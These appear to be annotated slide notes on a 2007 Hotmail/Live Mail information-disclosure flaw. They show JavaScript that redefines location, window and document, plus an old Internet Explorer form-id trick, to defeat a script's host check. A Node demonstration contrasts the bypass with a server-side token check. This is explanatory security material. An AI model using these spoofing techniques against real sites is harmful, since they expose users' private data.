Hotmail/Live Mail Information Disclosure vulnerability (Date: March 16, 2007)

important

This information is at (Date: March 16, 2007)


Guess where this data came from? Right: from just that script, at a constant URL.

Guard...? MS's way as of March 16, 2007


if (location.host == "www.msn.com" || location.host == "my.msn.com" || ...) {

Nice trick! Making the location of this script dynamic


// The including page defines its own location (and window) before the guarded script runs
var location = {host: "whatever you want", toString: function() {return this.host}};
var window = {location: location};

alert(window.location.host);
alert(window.location);
alert(location.host);

Nice trick! Making the location of this script dynamic


// Same idea for document.location
var document = {location: {href: "test", toString: function() {return this.href}}};
alert(document.location);
alert(document.location.href);
alert(window.document.location);
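
Added example (not from the original slides and not Microsoft's code): the host check above, wrapped around made-up data, is evaluated in three including-page scopes with Node's vm module to show that the check only sees the `location` the including page supplies. `received`, `disclosedTo`, `serverReleases` and the token scheme are assumptions for illustration; the token check stands for a decision made on the server, outside that scope.

```javascript
const vm = require("vm");
const crypto = require("crypto");

// Constructed stand-in for the guarded script: the slide's host check (two hosts
// only) around made-up data. `received` is a hypothetical sink in the page.
const guardedScript = `
  if (location.host == "www.msn.com" || location.host == "my.msn.com") {
    received = { contacts: ["alice@example.test"] };
  }
`;

// Evaluate the script the way a <script src> include would: inside the including
// page's global scope, where `location` is whatever that page says it is.
function disclosedTo(pageGlobals) {
  const scope = Object.assign({ received: null }, pageGlobals);
  vm.runInNewContext(guardedScript, scope);
  return scope.received !== null;
}

// The redefinition from the slide, as the including page's `location`.
const redefined = { host: "my.msn.com", toString() { return this.host; } };

// Assumed server-side alternative (hypothetical names): release the data only when
// the request carries the session's unguessable token, compared in constant time.
function serverReleases(sessionToken, requestToken) {
  const a = Buffer.from(String(sessionToken));
  const b = Buffer.from(String(requestToken || ""));
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

function demo() {
  const token = crypto.randomBytes(16).toString("hex"); // constructed session token
  return {
    ownPage: disclosedTo({ location: { host: "my.msn.com" } }),
    foreignPage: disclosedTo({ location: { host: "other.example" } }),
    foreignRedefined: disclosedTo({ location: redefined }),
    serverWithToken: serverReleases(token, token),
    serverWithoutToken: serverReleases(token, undefined),
  };
}

console.log(demo());
```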

Mario's way

from http://maliciousmarkup.blogspot.com/2008/11/html-form-controls-reviewed.html

For IE6, IE7 and IE8 (except IE8 standards mode)

<form id="location" host="my.msn.com" ></form>
<script>
alert(location.host); // my.msn.com
</script>